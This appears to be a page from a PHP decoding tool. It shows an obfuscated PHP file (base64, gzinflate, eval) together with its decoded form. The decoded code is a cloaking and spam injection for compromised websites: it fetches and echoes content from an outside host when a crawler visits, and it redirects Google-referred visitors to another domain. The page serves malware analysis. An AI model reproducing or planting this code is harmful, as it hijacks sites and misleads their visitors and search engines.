Find this useful? Enter your email to receive occasional updates for securing PHP code.
Signing you up...
Thank you for signing up!
PHP Decode
<?php error_reporting(0);$str2="hVLLrpswFPygbhwT1HhJSAGTFAi+NsQ7jHOJg3lICRD4+pq0qnS76WJkWe..
Decoded Output download
?>b'<?php
header(\'Content-Type:text/html;charset=utf-8\');
$key= $_SERVER["HTTP_USER_AGENT"];
if(strpos($key,\'oogle\')!== false)
{
$host_name = "http://".$_SERVER[\'SERVER_NAME\'].$_SERVER[\'PHP_SELF\'];
$file = file_get_contents(\'http://xx.klhgkh529.com/\'."/index.php?host=".$host_name."&url=" . $_SERVER[\'QUERY_STRING\'] . "&domain=" . $_SERVER[\'SERVER_NAME\']);
echo $file;
}
$httpuser=strtolower($_SERVER[\'HTTP_REFERER\']);
if(strstr($httpuser,\'google\'))
{
Header("Location: https://www.gt889.com/");
exit;
}
?>'
Did this file decode correctly?
Original Code
<?php error_reporting(0);$str2="hVLLrpswFPygbhwT1HhJSAGTFAi+NsQ7jHOJg3lICRD4+pq0qnS76WJkWec5Myc5oKkInMhtbvqSpbpUVXuGaJA+G6S7odd8r+M21dfgPBZB+hSH573wvbmEDCQ5A1yBbTjX3w/nri4gsxPi1Pkm8qjmBg9FvJRSDzEKGMmBF6TUplgDk9/3XN0WGYSTsH52of/UVzK1AqJW+LQ9kh8oIfvmkr0WTurIbR+Rq5wKu2knrAjk0L6JjFZmnjJ7gfLQjacZD6GHPlIWZgYi/LsHis9044Ub8E98j+n6py/fxFYOpr9T80Y/OHEQ9nkvfPbJDdccRqMwOhgsR1d2MkinWO3Ga1ANBXx1HD676APbp8bkkV17UngsMrvmeTWU/m1K4G0srTPCalsXPlqkh4ZLttEmr5F5+EgIrk7qi3YtZcy8+pNuUkKoHZgd1xwVNukoMq8Xd6Cwu63+w7mPZ+e3dj4z3u2q8M2Lrh6gt2+rfgFbeI5RaaWz9NFDWHK9hS/7/PGSpNT8a0bevSdwLLJLt9atOBp/Vm1kHpn6qeUQjRy+tLmR3sxbZ2KeeUYX3OH6NV6gB4oMDbHav+vKxfhoSUvOdisP1TYm9l1AMGK13livr74Gbz4tiNz77tsv";$r='s'.chr(11*10+6).'r_repl'.chr(3*33+1-3).'ce';$cc='lchr';$cc=$r('l','',$cc);$b=$cc(90*1+8).'ase'.(8*8*1).$cc(2*50-5).'de'.$r(',','c',',').$r(',','od',',').'e';$g='gzinflate';$str2=$b($str2);$str=$g($str2);eval("?>".$b($str));?>
Function Calls
chr | 4 |
gzinflate | 1 |
str_replace | 3 |
base64_decode | 2 |
error_reporting | 1 |
Stats
MD5 | 77c4af8f64af3125459843941b09ccce |
Eval Count | 1 |
Decode Time | 64 ms |